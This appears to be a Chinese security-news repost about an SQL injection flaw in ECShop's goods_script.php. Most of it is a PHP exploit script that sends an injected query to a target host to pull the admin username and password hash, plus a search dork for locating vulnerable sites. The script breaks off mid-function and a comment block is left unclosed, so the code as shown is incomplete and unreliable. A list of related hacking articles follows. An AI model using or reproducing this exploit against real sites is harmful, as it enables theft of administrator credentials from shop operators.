ECShop的漏洞：sql没有初始化

2018-03-07 19:45:05责编：llp 来源：驱动管家人气：

影响2.5.x和2.6.x,其他版本未测试

goods_script.php

44行:

ECShop的漏洞：sql没有初始化

$sql没有初始化,很明显的一个漏洞:)

EXP:

复制代码

代码如下:

#!/usr/bin/php

print_r('

+---------------------------------------------------------------------------+

ECShop<= v2.6.2 SQL injection / admin credentials disclosure exploit

by puret_t

mail: puretot at gmail dot com

team: http://bbs.wolvez.org

dork: "Powered by ECShop"

+---------------------------------------------------------------------------+

');

/**

* works with register_globals = On

if ($argc < 3) {

print_r('

+---------------------------------------------------------------------------+

Usage: php '.$argv[0].' host path

host: target server (ip/hostname)

path: path to ecshop

Example:

php '.$argv[0].' localhost /ecshop/

+---------------------------------------------------------------------------+

');

exit;

}

error_reporting(7);

ini_set('max_execution_time', 0);

$host = $argv[1];

$path = $argv[2];

$resp = send();

preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);

if ($hash)

exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");

else

exit("Exploit Failed!\n");

function send()

{

global $host, $path;

$cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';

$data = "POST ".$path."goods_script.php?type=".time()." HTTP/1.1\r\n";

$data .= "Accept: */*\r\n";

$data .= "Accept-Language: zh-cn\r\n";

$data .= "Content-Type: application/x-www-form-urlencoded\r\n";

$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

$data .= "Host: $host\r\n";

$data .= "Content-Length: ".strlen($cmd)."\r\n";

$data .= "Connection: Close\r\n\r\n";

$data .= $cmd;

电脑文件夹加密怎么做？硬件文件夹加密好还是软件文件夹加密好？
现在，在公司上班族中，由于每天都会形成很多工作文件，一些文件还涉及到单位的无形资产和商业机密，如何保护这些文件的安全就成为当前企业网络管理的重要方面。而对于电脑文件加密，则通常有两种方法：软件加密
详情2018-01-07 08:28:05责编：llp 来源：驱动管家
asp.net基础教程使用asp.net加密口令保护用户数据安全
当我们在网站上建立数据库时，保护用户的信息安全是非常必要的。多数用户不愿意让别人知道自己的信息，同时网管也不想因为安全问题而丢失网站的信誉。无论对于谁，安全问题都是非常重要的。为了解决这个问题，我
详情2018-01-22 13:53:07责编：llp 来源：驱动管家
x-scan是什么？x-scan怎么安装与使用？
X-Scan简介X-Scan是中国著名的综合扫描器之一，它是免费的而且不需要安装的绿色软件、界面支持中文和英文两种语言、包括图形界面和命令行方式（X-Scan 3 3以后取消命令行方式）。X-Scan主要由国内著名的民间黑客
详情2018-01-26 16:25:23责编：llp 来源：驱动管家
木马suf 1.0的原理木马suf 1.0的厉害之处
一个14岁的男孩经过无数次的实验，推出了一款全新的木马——SUF 1 0，该后门运用了“反弹端口原理”与“FTP 隧道技术”，也就是两台机器不直接传输数据，而是利用第三台机器（FTP服务器）来交换数据 SUF（Shell
详情2018-02-04 14:02:01责编：llp 来源：驱动管家
通过oracle注入直接取得主机cmdshell的方法
原文发表在黑客手册linx 2008 1 12介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。以下的演示都是在web上的sql plus执行的，在web注入时把select SYS DBMS_EXPORT_EXTENSION… 改成 xxx jsp?id
详情2018-02-13 20:20:26责编：llp 来源：驱动管家
怎么解决苹果浏览器safari处理超长的文件时存在漏洞的问题？
Safari处理超长的文件时存在漏洞，如果使用Safari下载了带有超长文件名的文件的话，就可以触发访问破坏，浏览器可能会崩溃。发布日期：2008-03-22 更新日期：2008-03-24 受影响系统： Apple Safari 3 1 描述： --------------------------------
详情2018-01-15 12:34:06责编：llp 来源：驱动管家
.php文件被apache服务器解析成php文件的问题如何解决？
主要问题是：不管文件最后后缀为什么，只要是 php *结尾，就会被Apache服务器解析成php文件，问题是apache如果在mime types文件里面没有定义的扩展名在诸如x1 x2 x3的情况下，最后一个x3的没有定义，他会给解析成
详情2018-02-16 13:07:06责编：llp 来源：驱动管家
动易4.03漏洞在哪里？动易4.03漏洞的原理
动易4 03上传漏洞。2005-1-10 就出来了，一直没有公布。看黑客防线的攻关第3关用的是动易所有公布出来了。影响版本: 动易4 03上面的是动易的上传代码，从上面分析，我们可以看到，它明显存在着上传漏洞。重要的
详情2018-02-26 17:05:57责编：llp 来源：驱动管家
网站漏洞扫描软件nmap有哪些功能？
nmap被开发用于允许系统管理员察看一个大的网络系统有哪些主机以及其上运行何种服务。它支持多种协议的扫描如UDP，TCP connect(),TCP SYN (half open), ftp proxy (bounce attack),Reverse-ident, ICMP
详情2018-01-30 14:07:38责编：llp 来源：驱动管家
数字签名有哪些过程？数字签名的原理是什么？
数字签名和加密的基本原理及其区别？1 数字签名主要经过以下几个过程：信息发送者使用一单向散列函数（HASH函数）对信息生成信息摘要；信息发送者使用自己的私钥签名信息摘要；信息发送者把信息本身和已签名的信
详情2018-01-20 13:30:15责编：llp 来源：驱动管家